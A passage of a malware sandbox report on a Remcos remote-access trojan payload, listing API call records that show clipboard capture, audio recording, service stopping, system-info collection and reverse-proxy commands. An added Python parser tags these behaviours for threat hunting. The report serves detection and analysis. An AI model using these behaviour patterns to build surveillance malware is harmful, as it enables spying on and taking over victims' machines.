                                                                                        • OpenClipboard.USER32 ref: 00416941
                                                                                        • EmptyClipboard.USER32 ref: 0041694F
                                                                                        • CloseClipboard.USER32 ref: 00416955
                                                                                        • OpenClipboard.USER32 ref: 0041695C
                                                                                        • GetClipboardData.USER32(0000000D), ref: 0041696C
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00416975
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                                                        • CloseClipboard.USER32 ref: 00416984
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                        • String ID: !D@
                                                                                        • API String ID: 2172192267-604454484
                                                                                        • Opcode ID: 217266dddd972f3c5e9f703bebafc66beb3104e9651149c41c4633369744174b
                                                                                        • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                                                                        • Opcode Fuzzy Hash: 217266dddd972f3c5e9f703bebafc66beb3104e9651149c41c4633369744174b
                                                                                        • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                        • String ID:
                                                                                        • API String ID: 221034970-0
                                                                                        • Opcode ID: c0082c5762a569dd6c794232c9d09aac69d1526d84f90b8f2ddcc8f825e948b5
                                                                                        • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                                                                        • Opcode Fuzzy Hash: c0082c5762a569dd6c794232c9d09aac69d1526d84f90b8f2ddcc8f825e948b5
                                                                                        • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%
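
The call sequences in the records on this page are what a detection engineer extracts from a sandbox report: the clipboard routine above calls GetClipboardData(0x0D), i.e. CF_UNICODETEXT, and then reaches the socket helper at 00404AA1 (send); the service routine above calls OpenSCManagerW, OpenServiceW and ControlService with control code 1, which is SERVICE_CONTROL_STOP; the dxdiag routine further down runs ShellExecuteW("open", "dxdiag"), sleeps and deletes a file. The Python below is an added example and not part of the Joe Sandbox output: it parses records in this report's `• Api.MODULE(args), ref: addr` format (the three sample records are copied from this page), decodes the two constants, and assigns behaviour tags. The rule table and the tag wording are my own choices, not Joe Sandbox signatures.

```python
"""Parse the per-function 'APIs' records of a Joe Sandbox report and map
the Win32 call sequences to behaviour tags for hunting.

Added illustration, not part of the Joe Sandbox report.  The sample
records below are copied from this report (process 6, image at 400000);
the behaviour rules and tag names are my own.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class Call:
    api: str
    module: str
    args: list[str]
    ref: str
    subcall: str | None  # callee address when flagged 'Part of subcall function'


# One record line: "• Name.MODULE(arg,arg), ref: 0041ABCD", optionally
# prefixed with "Part of subcall function 00404AA1:" and with no "(args)"
# when the sandbox recovered none (e.g. "OpenClipboard.USER32 ref: ...").
_LINE = re.compile(
    r"•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)


def parse_record(text: str) -> list[Call]:
    """Turn the lines of one function's APIs block into Call objects."""
    calls: list[Call] = []
    for line in text.splitlines():
        m = _LINE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


def _hex(arg: str) -> int | None:
    """Decode a hex argument; '?' or a recovered string literal yields None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


# Well-known constants that make the sequences readable.
CF_UNICODETEXT = 0x0D        # GetClipboardData format id
SERVICE_CONTROL_STOP = 0x01  # ControlService dwControl


def classify(calls: list[Call]) -> set[str]:
    """Map a function's call sequence to behaviour tags (my own rule set)."""
    names = {c.api for c in calls}
    direct = {c.api for c in calls if c.subcall is None}
    tags: set[str] = set()
    if {"OpenClipboard", "GetClipboardData"} <= names:
        fmt = next((_hex(c.args[0]) for c in calls if c.api == "GetClipboardData" and c.args), None)
        tags.add("clipboard capture" + (" (CF_UNICODETEXT)" if fmt == CF_UNICODETEXT else ""))
    if {"OpenSCManagerW", "OpenServiceW", "ControlService"} <= names:
        ctl = next((_hex(c.args[1]) for c in calls if c.api == "ControlService" and len(c.args) > 1), None)
        tags.add("service control" + (" (SERVICE_CONTROL_STOP)" if ctl == SERVICE_CONTROL_STOP else ""))
    if names & {"ShellExecuteW", "ShellExecuteExA"} and names & {"DeleteFileA", "DeleteFileW"}:
        tags.add("execute then delete file")
    if {"GetMessageA", "DispatchMessageA"} <= direct:
        tags.add("window message loop")
    if "send" in names and "send" not in direct:
        tags.add("result sent over socket via helper")
    return tags


# Records copied from this report (function summaries of the Remcos payload).
CLIPBOARD = """
• OpenClipboard.USER32 ref: 00416941
• EmptyClipboard.USER32 ref: 0041694F
• CloseClipboard.USER32 ref: 00416955
• OpenClipboard.USER32 ref: 0041695C
• GetClipboardData.USER32(0000000D), ref: 0041696C
• GlobalLock.KERNEL32(00000000), ref: 00416975
• GlobalUnlock.KERNEL32(00000000), ref: 0041697E
• CloseClipboard.USER32 ref: 00416984
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
"""
SERVICE = """
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
• OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
"""
DXDIAG = """
• ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
• Sleep.KERNEL32(00000064), ref: 00417521
• DeleteFileW.KERNEL32(00000000), ref: 00417555
"""


def summarise(records: dict[str, str]) -> dict[str, set[str]]:
    """Classify several records at once, keyed by the caller's label."""
    return {name: classify(parse_record(text)) for name, text in records.items()}


if __name__ == "__main__":
    for name, tags in summarise({"clipboard": CLIPBOARD, "service": SERVICE, "dxdiag": DXDIAG}).items():
        print(f"{name}: {sorted(tags)}")
```

The argument columns the sandbox prints are stack snapshots, so only the leading, well-typed parameters (the clipboard format, the service control code) are decoded; `?` and recovered string literals such as `open` and `dxdiag` fall through as None rather than being misread as numbers.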

                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00448135
                                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                        • _free.LIBCMT ref: 00448141
                                                                                        • _free.LIBCMT ref: 0044814C
                                                                                        • _free.LIBCMT ref: 00448157
                                                                                        • _free.LIBCMT ref: 00448162
                                                                                        • _free.LIBCMT ref: 0044816D
                                                                                        • _free.LIBCMT ref: 00448178
                                                                                        • _free.LIBCMT ref: 00448183
                                                                                        • _free.LIBCMT ref: 0044818E
                                                                                        • _free.LIBCMT ref: 0044819C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                                        • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                                                                        • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                                        • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Eventinet_ntoa
                                                                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                        • API String ID: 3578746661-3604713145
                                                                                        • Opcode ID: ab18085dfb9070501b6a617d13a9934c7a772270e49a3b63cf56808473da2604
                                                                                        • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                                                                        • Opcode Fuzzy Hash: ab18085dfb9070501b6a617d13a9934c7a772270e49a3b63cf56808473da2604
                                                                                        • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DecodePointer
                                                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                        • API String ID: 3527080286-3064271455
                                                                                        • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                                                        • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                                                                        • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                                                        • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                                                                        • __fassign.LIBCMT ref: 0044B479
                                                                                        • __fassign.LIBCMT ref: 0044B494
                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                                                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
                                                                                        • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 1324828854-263838557
                                                                                        • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                                                        • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                                                                        • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                                                        • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                                                                        • Sleep.KERNEL32(00000064), ref: 00417521
                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CreateDeleteExecuteShellSleep
                                                                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                        • API String ID: 1462127192-2001430897
                                                                                        • Opcode ID: 2e7314534ae075b7e9c34f09803cfaa6cc8f3f1c8e39d8c57a36ae90e31f4a77
                                                                                        • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                                                                        • Opcode Fuzzy Hash: 2e7314534ae075b7e9c34f09803cfaa6cc8f3f1c8e39d8c57a36ae90e31f4a77
                                                                                        • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                                                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Users\Public\Libraries\nmfsxfjX.pif), ref: 0040749E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CurrentProcess
                                                                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                        • API String ID: 2050909247-4242073005
                                                                                        • Opcode ID: c96af00a5e7ec94e66acc45bf1863d5a4294996af44aaa2752f51638bf238a49
                                                                                        • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                                                                        • Opcode Fuzzy Hash: c96af00a5e7ec94e66acc45bf1863d5a4294996af44aaa2752f51638bf238a49
                                                                                        • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _strftime.LIBCMT ref: 00401D50
                                                                                          • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                        • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                        • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                                        • API String ID: 3809562944-243156785
                                                                                        • Opcode ID: 5d5d8b804b24dbb182b265a24ad27abd29ffba8ef4e2f14911defadce340a58b
                                                                                        • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                                                                        • Opcode Fuzzy Hash: 5d5d8b804b24dbb182b265a24ad27abd29ffba8ef4e2f14911defadce340a58b
                                                                                        • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                                                                        • int.LIBCPMT ref: 00410E81
                                                                                          • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                                                          • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                                                        • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                                                                        • __Init_thread_footer.LIBCMT ref: 00410F29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                        • String ID: ,kG$0kG
                                                                                        • API String ID: 3815856325-2015055088
                                                                                        • Opcode ID: 03644fa62921dd73c80b911a5d0dfda0042f6ff91148d324d9cd636e449b66af
                                                                                        • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                                                                        • Opcode Fuzzy Hash: 03644fa62921dd73c80b911a5d0dfda0042f6ff91148d324d9cd636e449b66af
                                                                                        • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                        • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                        • waveInStart.WINMM ref: 00401CFE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                        • String ID: dMG$|MG$PG
                                                                                        • API String ID: 1356121797-532278878
                                                                                        • Opcode ID: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                                                                        • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                                                                        • Opcode Fuzzy Hash: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                                                                        • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                                                                          • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                                                                          • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                                                                          • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                                                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                                                                        • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                                                                        • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                                                                        • TranslateMessage.USER32(?), ref: 0041D4E9
                                                                                        • DispatchMessageA.USER32(?), ref: 0041D4F3
                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                        • String ID: Remcos
                                                                                        • API String ID: 1970332568-165870891
                                                                                        • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                                        • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                                                                        • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                                        • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 984f3823f0f42f82cc4a86ce7b4d37cd777ac44a74ee2f2d7e0058df0e398b64
                                                                                        • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                                                                        • Opcode Fuzzy Hash: 984f3823f0f42f82cc4a86ce7b4d37cd777ac44a74ee2f2d7e0058df0e398b64
                                                                                        • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                        • _memcmp.LIBVCRUNTIME ref: 00445423
                                                                                        • _free.LIBCMT ref: 00445494
                                                                                        • _free.LIBCMT ref: 004454AD
                                                                                        • _free.LIBCMT ref: 004454DF
                                                                                        • _free.LIBCMT ref: 004454E8
                                                                                        • _free.LIBCMT ref: 004454F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                                        • String ID: C
                                                                                        • API String ID: 1679612858-1037565863
                                                                                        • Opcode ID: 95a5055c0f5b4626ae5439ab0ac3d92ffbfe406232e79e21228b3c6dd4324b4e
                                                                                        • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
